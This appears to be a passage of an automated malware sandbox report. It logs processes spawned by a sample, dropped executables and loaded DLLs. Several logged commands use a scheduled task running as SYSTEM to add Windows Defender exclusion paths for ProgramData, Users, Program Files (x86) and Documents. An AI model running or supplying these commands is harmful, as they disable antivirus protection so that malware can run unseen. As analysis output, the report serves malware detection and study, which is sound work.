Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Program Files (x86)\bmaosk\bmaosk.exe "C:\Program Files (x86)\bmaosk\bmaosk.exe"
Source: unknownProcess created: C:\Program Files (x86)\bmaosk\bmaosk.exe "C:\Program Files (x86)\bmaosk\bmaosk.exe"
Source: unknownProcess created: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe "C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe"
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe "C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe"
Source: unknownProcess created: C:\Program Files (x86)\bmaosk\bmaosk.exe "C:\Program Files (x86)\bmaosk\bmaosk.exe"
Source: unknownProcess created: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe "C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe"
Source: unknownProcess created: C:\Program Files (x86)\bmaosk\bmaosk.exe "C:\Program Files (x86)\bmaosk\bmaosk.exe"
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Program Files (x86)\5phaM8\5phaM8.exe "C:\Program Files (x86)\5phaM8\5phaM8.exe"
Source: unknownProcess created: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe "C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe"
Source: unknownProcess created: C:\Program Files (x86)\bmaosk\bmaosk.exe "C:\Program Files (x86)\bmaosk\bmaosk.exe"
Source: unknownProcess created: C:\ProgramData\kfbe6yYK.exe C:\ProgramData\kfbe6yYK.exe
Source: unknownProcess created: C:\ProgramData\EsnjLDMo\9eYJWFQF.exe C:\ProgramData\EsnjLDMo\9eYJWFQF.exe
Source: unknownProcess created: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe "C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe"
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Program Files (x86)\bmaosk\bmaosk.exe "C:\Program Files (x86)\bmaosk\bmaosk.exe"
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Program Files (x86)\bmaosk\bmaosk.exe "C:\Program Files (x86)\bmaosk\bmaosk.exe" Jump to behavior
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Program Files (x86)\5phaM8\5phaM8.exe "C:\Program Files (x86)\5phaM8\5phaM8.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.iniJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: twext.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: cscui.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: acppage.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: aepic.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: twext.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: cscui.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: acppage.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: aepic.dllJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: tbcore3u.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: sxs.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: devenum.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: winmm.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeSection loaded: tbcore3u.dll
Source: C:\ProgramData\kfbe6yYK.exeSection loaded: apphelp.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: netapi32.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: oledlg.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: olepro32.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: urlmon.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: version.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: wininet.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: winmm.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: iertutil.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: srvcli.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: netutils.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: uxtheme.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: kernel.appcore.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: windows.storage.dll
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeSection loaded: wldp.dll
